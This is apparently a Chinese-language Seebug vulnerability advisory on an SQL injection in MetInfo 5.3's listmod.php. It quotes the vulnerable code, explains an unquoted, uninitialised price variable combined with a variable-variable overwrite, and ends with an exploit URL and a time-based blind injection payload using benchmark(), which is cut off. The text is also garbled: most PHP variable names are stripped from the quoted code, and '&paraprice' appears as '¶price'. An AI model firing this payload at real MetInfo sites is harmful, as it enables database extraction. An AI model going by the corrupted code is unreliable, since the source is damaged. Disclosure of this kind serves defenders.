MetInfo 5.3 /include/global/listmod.php SQL注入

2015-09-07T00:00:00
ID SSV:89367
Type seebug
Reporter Root
Modified 2015-09-07T00:00:00

Description

看到 MetInfo5.3/include/global/listmod.php 164-184行 foreach( as =){=paraprice_.[id];=$;var_dump();if(){if(!strstr(, -)){preg_match(/([0-9\.]+)/,,); 看到

MetInfo5.3/include/global/listmod.php

164-184行

``` foreach( as =>){ ="paraprice_".['id']; =$; var_dump(); if(){ if(!strstr(, "-")){ preg_match('/([0-9.]+)/',,); =[0]; .= " and exists(select * from where module=3 and .paraid='[id]' and .listid=.id and .info > ) "; .= "&".."=".trim($); }else{ //echo 3; =explode('-',); preg_match('/([0-9.]+)/',[1],); =[0]; .= " and exists(select * from where module=3 and .paraid='[id]' and .listid=.id and .info > [0] and .info < ) "; .= "&".."=".trim($); } } }

```

其中 $prices_sql[0] 没有初始化,也没有单引号包裹。造成sql注入,但是前面有个逻辑判断。

首先这里有个变量覆盖 $prices=$$prices1; 并且 paraprice_".$val2['id'] 我们可以控制。

只有构造如下url就行了

```

?search=search&mdmendy=1¶price_14=tomato-xxxx&mdname=product ``` payload:

?search=search&mdmendy=1¶price_14=1) or if(ascii(mid(user(),1,1))=114,benchmark(10000000, <!-- -->